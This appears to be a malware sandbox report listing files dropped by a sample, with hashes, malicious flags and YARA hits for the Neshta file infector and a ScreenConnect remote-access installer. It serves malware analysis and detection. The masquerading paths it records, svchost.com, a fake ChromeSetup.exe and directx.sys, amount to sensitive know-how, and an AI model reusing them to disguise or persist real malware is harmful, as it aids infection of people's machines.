                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Joe Security
                                                                        C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.485564517117053
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                        MD5:6A3C227401357DD0ACEE2988511EC44C
                                                                        SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                                        SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                                        SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                                        Malicious:true
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\$RUX313H.exe.log
                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.3467126928258955
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                        MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                        SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                        SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                        SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                        Malicious:true
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):746
                                                                        Entropy (8bit):5.3527160501124875
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhaOK9eDLI4MNJK9zKHK9yiP:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFT
                                                                        MD5:4EF5C487B6A253BA22FF6B9F0543D2A8
                                                                        SHA1:0C17B4E9B9EEBBA1E239D620552321182A2F792F
                                                                        SHA-256:E14BBB9471C4AAD8444B61E2DB5C08D08C88E18F4530248C19B3EBF3676C765F
                                                                        SHA-512:CC7857687809D749898792C874A54CA174D26AC0D2DE5FF699D280E3B4810D298EA03FE76C51F8191C9D636F7EE40D50F7A19E430A4E3BD40C86083EC0A7794F
                                                                        Malicious:false
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5964179831347325
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Joe Security
                                                                        C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4235144
                                                                        Entropy (8bit):7.178988683349245
                                                                        Encrypted:false
                                                                        SSDEEP:49152:hbegT0+TL3Z0Mi963PSuIiH7efPKJqqLGVgM/1n7CJGcU3UPXGuI8Ewj1g+:M316Q6efPuPLC1n7CQcmIG7uN
                                                                        MD5:F405B7A5D5C7F37504067037D2CF44AE
                                                                        SHA1:F78E9E8F20346AC2FEC828D3E48EBA9BDB3D3AFB
                                                                        SHA-256:7EF82E0D15D6292A02449789655D3FBC1E774F34531E1CA342316B0C3F94C01F
                                                                        SHA-512:15890BBC34B013BA92353F8751C27A81EFB61668185EC95F6B41C5E1D8B4902CF2C772F824DE8C75922F5DEE32C7F76E055D1D08636F348713B3B66946F60277
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, Author: Joe Security
                                                                        C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.265455130586502
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                                        MD5:BB762A775319A10BBC68B0EA9822F00E
                                                                        SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                                        SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                                        SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                                        Malicious:true
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp
                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                        Category:dropped
                                                                        Size (bytes):340104
                                                                        Entropy (8bit):6.967776450044392
                                                                        Encrypted:false
                                                                        SSDEEP:6144:4UUG777hkC5WF5YKmzSnGSnpBC3dGx7WJcELgDwhIP+h5YavDGmah:4UUa/hku7KM4GSpkt07bDwfvvk
                                                                        MD5:7061F3A416C3A2973F4BF8497291D47A
                                                                        SHA1:3CE580CA5E6EFC01342AA5836AA85F1A4ADBF3D2
                                                                        SHA-256:7F97AF554506C7B0229C4269391AB418430D4EC08A379AC02A9F2344350665D1
                                                                        SHA-512:475600C1BF4D075436331FF6005439F5C570279112C5587E95D7D5C1C5817CD870FD55BAF4B226CCD8D83ABFCB217CCD31CFBF9EF144E294480AB208DA4CAB65
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\CustomAction.config
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):228
                                                                        Entropy (8bit):5.069688959232011
                                                                        Encrypted:false
                                                                        SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                        MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                        SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                        SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                        SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                        Malicious:false
                                                                         Preview:
                                                                         <?xml version="1.0" encoding="utf-8" ?>
                                                                         <configuration>
                                                                           <startup useLegacyV2RuntimeActivationPolicy="true">
                                                                             <supportedRuntime version="v4.0" />
                                                                             <supportedRuntime version="v2.0.50727" />
                                                                           </startup>
                                                                         </configuration>
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):5.775360792482692
                                                                        Encrypted:false
                                                                        SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                        MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                        SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                        SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                        SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):371200
                                                                        Entropy (8bit):5.9748911687895365
                                                                        Encrypted:false
                                                                        SSDEEP:6144:wplDccjhts4N+/Xon+LAM+tIVnF6nWpnPq8uiph/jISvVx4k4DEV7PX4:wp57joy7yAHtKnJlpx7f
                                                                        MD5:CA0F11FB4EC67C9B1EAF6B2D790830DA
                                                                        SHA1:4BDABF67897A2EF58E97AD4F96C5CA96AB846E28
                                                                        SHA-256:418E1EDEE0E84AFB4FF1A75AA1AEF204CEAAA4A54F67AB9829718775A6C9BE8A
                                                                        SHA-512:975B9704F5532A6ACA2BE23B8507AF3879CCE0441B0850784D6B4D8888DE86A0AFF1018A53D1A50AC5BBB210F1D47775525F1628950E2B8BDF8076C07A3D373B
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):17920
                                                                        Entropy (8bit):5.043548817128609
                                                                        Encrypted:false
                                                                        SSDEEP:384:BpRHsZ0S7sLxKnr1aN2GF8JrMXm1kjv+U5ydombDmz:BLsf7uxKnkNF82D5yJbDO
                                                                        MD5:5BD8E7A056CEEBED1E8DAF551084A2B0
                                                                        SHA1:877CA32D61A5826B53BC9C36583F24A983B15A6E
                                                                        SHA-256:FAFB3AAA1EB5CB6360B71C4EB70C2CBF4EE98B654C228CC463EBE738E033AAE5
                                                                        SHA-512:8924258C5ABDC33BACCCA55265CDC928CD2448D2A8D1CE162437D59859E326FAC4C459C366A0736F3C263E50DA4E5C2EA43438996E296F6539D3663A64F3B550
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\setup.msi
                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        C:\Windows\Installer\5e0b03.msi
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        C:\Windows\Installer\5e0b05.msi
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        C:\Windows\Installer\MSI1045.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        C:\Windows\Installer\MSI11DE.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        C:\Windows\Installer\MSI13D3.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        C:\Windows\Installer\MSIDF1.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):628836
                                                                        Entropy (8bit):6.574722557682612
                                                                        Encrypted:false
                                                                        SSDEEP:12288:kuH2anwohwQUv9uH2anwohwQUv5uH2anwohwQUvx:kurhwQUv9urhwQUv5urhwQUvx
                                                                        MD5:A23528002B8FCE676EE9E7BC9CA836E5
                                                                        SHA1:6F8B987FFE76BF424BFC747F80BFBA8E27DA9BD8
                                                                        SHA-256:22C2A7F12327568BBC5EB0D837DC4BB0287AFB41F61BCF4AC935A78E1488540F
                                                                        SHA-512:FCA7522C28C010EED1FDECDFB048C1C59475858B710D21D0795B9103F3605AB4431B2E309689AC04E372BDCC0F23AB818313892258C23256146717340D569FF9
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIDF1.tmp, Author: Joe Security
                                                                        Preview: ...@IXOS.@.....@..AS.@.....@.....@.....@.....@.....@......&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}'.ScreenConnect Client (77af187dd37f08fd)..setup.msi.@.....@Qb...@.....@......DefaultIcon..&.{9C0A6111-B899-49EE-9A79-EF61274BA5E5}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (77af187dd37f08fd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4768BE46-975A-455C-AF15-61A15FE629A4}7.C:\ProgramData\ScreenConnect Client (77af187dd37f08fd)\.@.......@.....@.....@......&.{6DCE5A21-0DC7-4711-A8DC-2DDE062B4424}^.C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{4131B28B-C591-485C-81BB-59C107C8780A}^.C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe.@.......@.....@.....@......&.{65DC5071-7A1F-4E32-8C11-DC3D60C6
                                                                        C:\Windows\Installer\MSIDF2.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        C:\Windows\Installer\MSIFE7.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}\DefaultIcon
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:MS Windows icon resource - 3 icons, 16x16 withPNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 withPNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                        Category:dropped
                                                                        Size (bytes):435
                                                                        Entropy (8bit):5.289734780210945
                                                                        Encrypted:false
                                                                        SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                        MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                        SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                        SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                        SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                        Malicious:false
                                                                        Preview: ..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):94
                                                                        Entropy (8bit):4.576182466583999
                                                                        Encrypted:false
                                                                        SSDEEP:3:MKVRUjJ6fF20i2OFNRgLLLC1wK+SOv:MKHqg321wK+SOv
                                                                        MD5:5B718604B8883B24330B4E20AAA2F010
                                                                        SHA1:B5D9BC4099CBD73D0EC33122A2AE40B63D749A3F
                                                                        SHA-256:962565458723129DFD7F08EFEA317307868A974C1E3A0FEF5187AB61639DFB23
                                                                        SHA-512:11C085604EC58610328FA1000BE72187B33C1DA4E23FF32A6F8D7E84F83699DD9E267A988EA2B51F160A3BE933F9BE21AB4BFC6C5DE2538E66151398CC5E1E98
                                                                        Malicious:false
                                                                        Preview: 10/01/2021 21:52:30.551 [5648]: Setting MSI handle, install logging will go into the MSI log..
                                                                        C:\Windows\directx.sys
                                                                        Process:C:\Windows\svchost.com
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):66
                                                                        Entropy (8bit):4.222593650305007
                                                                        Encrypted:false
                                                                        SSDEEP:3:oXeFA7kyYeFA7n:oXe67kyYe67n
                                                                        MD5:C5691EEA78451675BB8A46B32223CE08
                                                                        SHA1:3448C990CA3C992539F781954FA63A1B1ADC33B7
                                                                        SHA-256:61952E3207119C3D2117B2A246B6E67562BF6917198AF8EC530710C3F283B08A
                                                                        SHA-512:515F50DC21C6BC0343F0518AA6B9400B7C8D38F980831DF587AA182D830C596546C2D35F02ECDCA0716CC91CF7040BBA7D416DC17984B923258DDF8AEF6130E8
                                                                        Malicious:true
                                                                        Preview: C:\Windows\System32\msiexec.exe..C:\Windows\System32\msiexec.exe..
                                                                        C:\Windows\svchost.com
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):41472
                                                                        Entropy (8bit):5.976684810818399
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                                        MD5:36FD5E09C417C767A952B4609D73A54B
                                                                        SHA1:299399C5A2403080A5BF67FB46FAEC210025B36D
                                                                        SHA-256:980BAC6C9AFE8EFC9C6FE459A5F77213B0D8524EB00DE82437288EB96138B9A2
                                                                        SHA-512:1813A6A5B47A9B2CD3958CF4556714AE240F2AA19D0A241B596830F0F2B89A33EC864D00CE6A791D323A58DFBFF42A0FDED65EEFBF980C92685E25C0EC415D92
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
